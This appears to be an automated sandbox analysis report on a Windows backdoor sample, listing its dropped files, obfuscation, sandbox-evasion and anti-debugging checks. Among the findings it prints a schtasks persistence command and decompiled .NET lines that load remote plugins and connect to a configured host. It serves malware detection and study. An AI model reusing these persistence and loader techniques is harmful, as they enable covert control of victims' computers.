Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

PE file contains an invalid checksum

Source: Northeast.0.dr

Static PE information: real checksum: 0xf6bf3 should be: 0x42226

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004902D8 push cs; retn 0048h	11_2_00490318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460DE6 push ecx; ret	11_2_00460DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045DC7C push AA0049CFh; iretd	11_2_0045DC87

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif			Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_004D26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_0045FC7C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 4D10000 memory reserve \| memory write watch

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Window / User API: threadDelayed 5579

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

API coverage: 4.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep count: 5579 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep time: -55790s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Thread sleep count: Count: 5579 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Source: Telecom.pif, 0000000B.00000002.2443431960.0000000003ABB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF4FF BlockInput,

11_2_004BF4FF

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00465058 mov eax, dword ptr fs:[00000030h]

11_2_00465058

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

11_2_004A20AA

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

